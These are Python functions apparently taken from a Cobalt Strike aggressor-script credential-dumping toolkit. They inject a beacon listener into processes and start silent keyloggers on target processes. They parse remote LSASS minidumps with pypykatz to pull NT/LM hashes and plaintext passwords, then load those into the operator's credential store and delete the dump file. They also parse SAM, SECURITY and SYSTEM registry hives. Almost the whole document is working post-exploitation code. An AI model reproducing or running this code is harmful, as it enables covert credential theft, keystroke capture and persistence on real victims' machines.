def parse_registry(bid, boffilepath, system_filepath, sam_filepath=None, security_filepath=None, software_filepath=None, chunksize=10240, outputs=['text']): engine.message('parse_registry invoked') engine.message('bid %s' % bid) engine.message('system_filepath %s' % system_filepath) engine.message('sam_filepath %s' % sam_filepath) engine.message('security_filepath %s' % security_filepath) engine.message('software_filepath %s' % software_filepath) engine.message('chunksize %s' % chunksize) system_file = BaconFileReader(bid, system_filepath, boffilepath, chunksize=chunksize) sam_file = None if sam_filepath is not None and len(sam_filepath) > 0: sam_file = BaconFileReader(bid, sam_filepath, boffilepath, chunksize=chunksize) security_file = None if security_filepath is not None and len(security_filepath) > 0: security_file = BaconFileReader(bid, security_filepath, boffilepath, chunksize=chunksize) software_file = None if software_filepath is not None and len(software_filepath) > 0: software_file = BaconFileReader(bid, software_filepath, boffilepath, chunksize=chunksize) starttime = datetime.datetime.utcnow() po = OffineRegistry.from_files(system_file, sam_path=sam_file, security_path=security_file, software_path=software_file, notfile=True) endtime = datetime.datetime.utcnow() runtime = (endtime - starttime).total_seconds() engine.message('TOTAL RUNTIME: %ss' % runtime) engine.message(str(po)) if 'text' in outputs: engine.message(str(po)) aggressor.blog(bid, str(po)) if 'json' in outputs: engine.message(po.to_json()) aggressor.blog(bid, po.to_json())
def parsed_callback(procs): found = None for search in proc_names: for proc in procs: if search == proc['name'] and 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Injecting listener {} into process {} ({} {})'.format( listener, proc['name'], proc['pid'], proc['arch'])) aggressor.binject(bid, proc['pid'], listener, proc['arch']) return # nothing found aggressor.berror( bid, "Didn't find any processes to inject listener {}".format(listener))
def parsed_callback(procs): found = None for search in proc_names: for proc in procs: if search == proc['name'] and 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Keylogging process {} ({} {})'.format( proc['name'], proc['pid'], proc['arch'])) aggressor.bkeylogger(bid, proc['pid'], proc['arch'], silent=True) return # nothing found aggressor.berror(bid, "Didn't find any processes to inject keylogger")
def parsed_callback(procs): for proc in procs: if 'arch' in proc and 'user' in proc: # inject it aggressor.blog( bid, 'Keylogging process {} ({} {})'.format( proc['name'], proc['pid'], proc['arch'])) aggressor.bkeylogger(bid, proc['pid'], proc['arch'], silent=True) return # nothing found if proc_name: aggressor.berror( "Didn't find any processes named '{}' to inject keylogger". format(proc_name)) else: aggressor.berror("Didn't find any processes to inject keylogger")
def _(bid, *args): msg = ' '.join(args) aggressor.blog(bid, msg)
def parse_lsass(bid, filepath, boffilepath, chunksize, packages=['all'], outputs=['text'], to_delete=False, add_creds=True): engine.message('parse_lsass invoked') engine.message('bid %s' % bid) engine.message('filepath %s' % filepath) engine.message('chunksize %s' % chunksize) engine.message('packages %s' % (','.join(packages))) starttime = datetime.datetime.utcnow() bfile = BaconFileReader(bid, filepath, boffilepath, chunksize=chunksize) mimi = pypykatz.parse_minidump_external(bfile, chunksize=chunksize, packages=packages) engine.message(str(bfile)) endtime = datetime.datetime.utcnow() runtime = (endtime - starttime).total_seconds() engine.message('TOTAL RUNTIME: %ss' % runtime) if 'text' in outputs: engine.message(str(mimi)) aggressor.blog(bid, str(mimi)) if 'json' in outputs: engine.message(mimi.to_json()) aggressor.blog(bid, mimi.to_json()) if 'grep' in outputs: engine.message(mimi.to_grep()) aggressor.blog(bid, mimi.to_grep()) if to_delete is True: engine.call('fdelete', [bid, boffilepath, filepath, 1]) if add_creds is True: host = str(bid) for luid in mimi.logon_sessions: res = mimi.logon_sessions[luid].to_dict() for msv in res['msv_creds']: engine.message(repr(msv)) if pwconv(msv['NThash']) is not None: source = '[AGGROKATZ][%s][%s] LSASS dump %s' % ( 'msv', 'NT', filepath) aggressor.credential_add(str(msv['username']), pwconv(msv['NThash']), str(msv['domainname']), source, host) if pwconv(msv['LMHash']) is not None: source = '[AGGROKATZ][%s][%s] LSASS dump %s' % ( 'msv', 'LM', filepath) aggressor.credential_add(str(msv['username']), pwconv(msv['LMHash']), str(msv['domainname']), source, host) for pkgt in [ 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds', 'tspkg_creds' ]: for pkg in res[pkgt]: if pwconv(pkg['password']) is not None: source = '[AGGROKATZ][%s] LSASS dump %s' % (pkgt, filepath) aggressor.credential_add(str(pkg['username']), pwconv(pkg['password']), str(pkg['domainname']), source, host)
def test_alias(bid): aggressor.blog(bid, 'test_alias called for beacon: {}'.format(bid))